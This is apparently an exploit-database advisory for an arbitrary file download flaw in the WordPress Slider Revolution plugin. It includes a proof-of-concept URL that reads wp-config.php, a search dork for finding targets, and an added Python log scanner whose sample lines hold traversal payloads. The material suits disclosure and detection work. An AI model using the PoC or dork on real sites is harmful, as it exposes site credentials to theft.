WordPress Plugin Slider Revolution 4.1.4 - Arbitrary File Download
Author: Claudio Viviani
type: webapps
platform: php
port:
date_added: 2015-03-30
date_updated: 2015-03-30
verified: 0
codes: CVE-2015-1579;OSVDB-109645;CVE-2014-9734
tags: WordPress Plugin
aliases:
screenshot_url:
application_url:
# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# Software Link : Premium plugin
# Dork Google: revslider.php "index of"
# Date : 2014-07-24
# Tested on : Windows 7 / Mozilla Firefox, Linux / Mozilla Firefox
######################
# Description
The WordPress Slider Revolution Responsive plugin, version 4.1.4 and earlier, suffers from an arbitrary file download vulnerability: the img parameter of the revslider_show_image admin-ajax action is not confined to the plugin's image directory, so a path-traversal value such as ../wp-config.php (the file holding the site's database credentials) returns that file's contents, as the PoC below shows.
######################
# PoC
http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#####################
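Added detection example, not part of the original advisory: a Python script that scans Apache combined-format access-log lines for requests to the revslider_show_image action whose img value escapes the plugin's image directory, catching plain, percent-encoded and double-encoded traversal as well as absolute paths. The log lines are constructed, and the "/base/" anchor is a stand-in for the plugin's real image directory, which the advisory does not name.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined log format; not captured from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Mar/2015:10:15:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Mar/2015:10:15:07 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1804 "-" "Mozilla/5.0"
198.51.100.9 - - [30/Mar/2015:10:16:22 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slides/../slide1.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.9 - - [30/Mar/2015:10:16:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded traversal is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_image_dir(img: str) -> bool:
    """True if img resolves outside a notional base directory (traversal, absolute path or NUL)."""
    path = decode_fully(img).replace("\\", "/")
    if path.startswith("/") or "\0" in path:
        return True
    resolved = posixpath.normpath("/base/" + path)  # collapses ./ and ../ segments
    return not resolved.startswith("/base/")

def scan_log(text: str) -> list:
    """Return one finding per request that uses the vulnerable action with an escaping img value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        query = parse_qs(urlsplit(m["url"]).query)  # parse_qs decodes one layer of %-encoding
        if query.get("action", [""])[0] != "revslider_show_image":
            continue
        img = query.get("img", [""])[0]
        if escapes_image_dir(img):
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                             "img": img, "decoded": decode_fully(img)})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} img={f['decoded']!r}")
```

A 200 status on a flagged request indicates the file was actually served, so those entries are the ones to treat as a confirmed disclosure rather than a blocked attempt.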
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################